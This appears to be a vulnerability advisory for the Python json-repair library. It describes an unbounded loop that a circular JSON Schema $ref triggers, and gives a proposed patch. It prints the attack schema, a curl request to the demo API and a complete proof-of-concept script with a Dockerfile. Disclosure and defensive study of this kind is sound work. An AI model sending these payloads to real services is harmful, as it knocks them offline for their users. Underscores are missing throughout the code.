PT-2026-64221 · Pypi · Json-Repair
Published
2026-07-13
·
Updated
2026-07-13
CVSS v3.1
7.5
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
Circular JSON Schema $ref causes unbounded CPU DoS in json repair
Summary
SchemaRepairer.resolve schema() in json repair follows JSON Schema $ref pointers in an unbounded while loop without any cycle detection. An attacker who can supply a schema containing a self-referencing $ref (e.g., via the demo Flask API or any application that passes untrusted input to loads(..., schema=...)), can cause a worker process to spin indefinitely on CPU, resulting in a complete denial of service. No authentication is required against the public demo API. The vulnerability is confirmed reproducible at CVSS 7.5 (High).Details
SchemaRepairer.resolve schema() at src/json repair/schema repair.py:184–190 resolves $ref chains using a plain while loop:python
# src/json repair/schema repair.py:184-190
schema dict = cast("dict[str, Any]", schema)
while "$ref" in schema dict:
ref = schema dict["$ref"]
resolved = self. resolve ref(ref)
if isinstance(resolved, bool):
return resolved
schema dict = resolved resolve ref() at src/json repair/schema repair.py:654–665 always resolves references relative to self.root schema, which is initialised from the caller-supplied schema (src/json repair/schema repair.py:130). When the schema contains a circular reference such as:json
{"$ref": "#/definitions/a", "definitions": {"a": {"$ref": "#/definitions/a"}}} resolve ref() returns the same dict object on every iteration, so "$ref" in schema dict is always True and the loop never terminates.The vulnerable sink is reachable without authentication through the demo Flask API:
python
# docs/app.py:14, 21-36
data = request.get json()
schema = data.get("schema")
if schema is not None and not isinstance(schema, (dict, bool)):
raise ValueError("schema must be a JSON object or boolean.")
...
if schema is not None:
loads kwargs["schema"] = schema
parsed json = loads(malformed json, **loads kwargs)The only guard is a top-level
isinstance(dict, bool) check; there is no $ref depth limit, no visited-set, and no timeout enforced by the library. The full data-flow path is:docs/app.py:14—request.get json()reads the attacker-controlled HTTP body.docs/app.py:21–23—schemais extracted; onlydict/booltype check applied.docs/app.py:33–36— schema is forwarded verbatim toloads().src/json repair/json repair.py:145–148—schema from input(schema)instantiatesSchemaRepairer.src/json repair/json repair.py:160—repairer.is valid()callsresolve schema(), triggering the infinite loop.src/json repair/schema repair.py:184–190— unboundedwhile "$ref" in schema dictloop (sink).src/json repair/schema repair.py:654–665—resolve ref()returns the same object on every call.
Recommended fix:
diff
--- a/src/json repair/schema repair.py
+++ b/src/json repair/schema repair.py
def resolve schema(self, schema: object | None) -> dict[str, Any] | bool:
...
- schema dict = cast("dict[str, Any]", schema)
+ schema dict = cast("dict[str, Any]", schema)
+ seen schema ids: set[int] = set()
while "$ref" in schema dict:
ref = schema dict["$ref"]
+ if not isinstance(ref, str):
+ raise SchemaDefinitionError("$ref must be a string.")
+ schema id = id(schema dict)
+ if schema id in seen schema ids:
+ raise SchemaDefinitionError(f"Circular $ref detected: {ref}")
+ seen schema ids.add(schema id)
resolved = self. resolve ref(ref)
if isinstance(resolved, bool):
return resolved
schema dict = resolved
return schema dictPoC
Environment setup:
bash
# Clone the affected version
git clone https://github.com/mangiucugna/json repair.git
git -C json repair checkout 0015c74c01bdafe4bb7435780657501741c2a5f7
# Install dependencies
pip install flask flask-cors jsonschema pydantic
pip install -e json repair/
# Start the demo API
PYTHONPATH=json repair/src flask --app json repair/docs/app run --host=127.0.0.1 --port=5005Alternatively, use the provided Docker image:
dockerfile
FROM python:3.11-slim
WORKDIR /app
COPY repo/ /app/repo/
RUN pip install --no-cache-dir flask flask-cors jsonschema pydantic &&
pip install --no-cache-dir -e /app/repo/
COPY vuln-001/poc.py /app/poc.py
CMD ["python3", "/app/poc.py"]bash
docker build -t vuln001-json-repair -f vuln-001/Dockerfile .
docker run --rm vuln001-json-repairHTTP attack request (demo API):
bash
timeout 5 curl -sS -X POST http://127.0.0.1:5005/api/repair-json
-H 'Content-Type: application/json'
--data '{"malformedJSON":"{}","schema":{"$ref":"#/definitions/a","definitions":{"a":{"$ref":"#/definitions/a"}}}}'
# Expected: no response before timeout; curl exits with code 124Direct library attack:
bash
timeout 5 python3 - <<'PY'
from json repair import loads
schema = {"$ref": "#/definitions/a", "definitions": {"a": {"$ref": "#/definitions/a"}}}
print(loads("{}", schema=schema))
PY
# Expected: process killed after 5 s; exit code 124Observed results (from Docker-based dynamic reproduction):
- Baseline (valid schema
{"type":"object","properties":{"name":{"type":"string"}}}): completed in 0.261 s. - Attack (circular
$refschema): timed out after 5.01 s — process killed; infinite loop confirmed.
Impact
This is an unauthenticated denial-of-service vulnerability. Any single HTTP request carrying a circular
$ref schema hangs the Flask worker process indefinitely, making the service unavailable to all other users until the process is killed or the server is restarted. Because the public demo API (docs/app.py) accepts the schema field from the request body without authentication and passes it directly to loads(), remote attackers can exploit this with a trivial one-liner.Beyond the demo API, any application that exposes
json repair.loads(..., schema=<user-controlled>) to untrusted callers is equally affected. The vulnerability requires no special privileges, produces no useful output for the attacker (confidentiality and integrity are unaffected), and is deterministically reproducible.Reproduction artifacts
Dockerfile
dockerfile
FROM python:3.11-slim
WORKDIR /app
# Copy the vulnerable json repair repository (build context is the report root)
COPY repo/ /app/repo/
# Install Flask demo API dependencies and schema extras
RUN pip install --no-cache-dir
flask
flask-cors
jsonschema
pydantic &&
pip install --no-cache-dir -e /app/repo/
# Copy the proof-of-concept script
COPY vuln-001/poc.py /app/poc.py
CMD ["python3", "/app/poc.py"]poc.py
python
#!/usr/bin/env python3
"""
PoC for VULN-001: Circular JSON Schema $ref causes unbounded CPU DoS
CWE-835 — Loop with Unreachable Exit Condition
Affected: json repair <= 0.59.10 (commit 0015c74)
Sink: src/json repair/schema repair.py:185
SchemaRepairer.resolve schema() while loop follows $ref without cycle detection.
Attack schema:
{"$ref": "#/definitions/a", "definitions": {"a": {"$ref": "#/definitions/a"}}}
When passed to loads(..., schema=<above>), resolve schema() enters an infinite loop
because resolve ref() always returns the same dict object from root schema.
Verdict logic:
- Baseline (valid schema) must complete in < TIMEOUT seconds.
- Attack (circular $ref) must still be running at TIMEOUT seconds.
Both conditions together constitute deterministic proof of the vulnerability.
"""
import os
import subprocess
import sys
import tempfile
import time
# Seconds to wait before declaring the attack confirmed (infinite loop)
TIMEOUT SECONDS = 5
CIRCULAR SCHEMA = {
"$ref": "#/definitions/a",
"definitions": {
"a": {"$ref": "#/definitions/a"}
}
}
NORMAL SCHEMA = {
"type": "object",
"properties": {
"name": {"type": "string"}
}
}
RUNNER TEMPLATE = """
import sys
sys.path.insert(0, '/app/repo/src')
from json repair import loads
schema = {schema repr}
result = loads('{{}}', schema=schema)
print(result)
"""
def run schema test(schema: dict, timeout: int) -> tuple[bool, float, str]:
"""
Run json repair loads() with the given schema in an isolated subprocess.
Returns:
timed out (bool): True if the process was still running at `timeout` seconds.
elapsed (float): Wall-clock seconds until completion or kill.
output (str): stdout/stderr excerpt.
"""
script content = RUNNER TEMPLATE.format(schema repr=repr(schema))
with tempfile.NamedTemporaryFile(mode="w", suffix=".py", delete=False) as fh:
fh.write(script content)
script path = fh.name
start = time.monotonic()
try:
proc = subprocess.run(
[sys.executable, script path],
timeout=timeout,
capture output=True,
text=True,
)
elapsed = time.monotonic() - start
output = (proc.stdout.strip() or proc.stderr.strip())[:400]
return False, elapsed, output
except subprocess.TimeoutExpired:
elapsed = time.monotonic() - start
return True, elapsed, f"[no output — process killed after {elapsed:.2f}s]"
finally:
os.unlink(script path)
def main() -> int:
print("=" * 64)
print("VULN-001 PoC: Circular $ref JSON Schema DoS")
print("json repair SchemaRepairer.resolve schema() — CWE-835")
print("=" * 64)
# --- Test 1: baseline (must complete quickly) ---
print(f"
[TEST 1] Baseline — valid schema (expect completion < {TIMEOUT SECONDS}s)")
timed out baseline, elapsed baseline, output baseline = run schema test(
NORMAL SCHEMA, TIMEOUT SECONDS
)
if timed out baseline:
print(f" UNEXPECTED TIMEOUT after {elapsed baseline:.2f}s — environment issue")
baseline ok = False
else:
print(f" COMPLETED in {elapsed baseline:.3f}s -> {output baseline}")
baseline ok = True
# --- Test 2: circular $ref attack (must time out) ---
print(
f"
[TEST 2] Attack — circular $ref schema"
f" (expect hang > {TIMEOUT SECONDS}s)"
)
print(f" Schema: {CIRCULAR SCHEMA}")
timed out attack, elapsed attack, output attack = run schema test(
CIRCULAR SCHEMA, TIMEOUT SECONDS
)
if timed out attack:
print(
f" TIMED OUT after {elapsed attack:.2f}s "
f"— infinite loop CONFIRMED (VULNERABLE)"
)
attack confirmed = True
else:
print(
f" Completed in {elapsed attack:.3f}s -> {output attack}"
f"
(patched or not triggered — check installation)"
)
attack confirmed = False
# --- Summary ---
print("
" + "=" * 64)
if baseline ok and attack confirmed:
print("VERDICT: PASS")
print(" Normal schema : returned in under 1 s")
print(f" Circular $ref : still running after {TIMEOUT SECONDS}s (killed)")
print(" Conclusion: resolve schema() enters an unbounded loop on circular $ref.")
return 0
elif not attack confirmed:
print("VERDICT: FAIL — circular $ref did not cause an infinite loop")
print(" The library may already be patched in this build.")
return 2
else:
print("VERDICT: FAIL — baseline test failed; check the environment")
return 3
if name == " main ":
sys.exit(main())Fix
Infinite Loop
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Json-Repair